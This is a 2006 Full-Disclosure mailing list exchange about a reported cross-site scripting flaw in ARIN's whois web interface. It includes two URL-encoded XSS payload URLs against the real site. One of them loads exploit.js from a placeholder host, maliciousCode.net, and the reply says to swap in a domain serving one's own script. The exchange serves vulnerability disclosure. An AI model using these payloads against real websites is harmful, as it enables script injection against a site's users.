Dave,
You need to copy and paste the full URL into your browser for the XSS to take place. All exploit examples are still working as I just verified.
<copy> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E </paste>
<copy> http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E </paste>
For my second example I used a fake domain name as an example of where the malicious code could be executed. Change the "maliciouscode.net" to a domain hosting your .js code for the exploit to take effect.
Thanks,
Discovered by Terminal Entry security [.at.] peadro (.)net
-----Original Message-----
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Dave
Korn
Sent: Friday, March 03, 2006 9:53 AM
To: [email protected]
Cc: [email protected]
Subject: [Full-disclosure] Re: Arin.net XSS
"Terminal Entry" <[EMAIL PROTECTED]> wrote in message
news:[EMAIL PROTECTED]
> Notification
> Multiple attempts to contact Arin site administrators went unanswered
Looks like someone was paying at least some attention, because none of
your examples worked when I tried them just now.
> Some demonstration exploit URLs are provided:
>
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%
28%27XSS%27%29%3B%22%3E
No match found for <IMG SRC="">.
>
http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fmalici
ousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
No match found for <XCRIPT
SRC="">
[ Funnily enough it goes bold after 'SRC=''t think of a witty .sigline today....
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
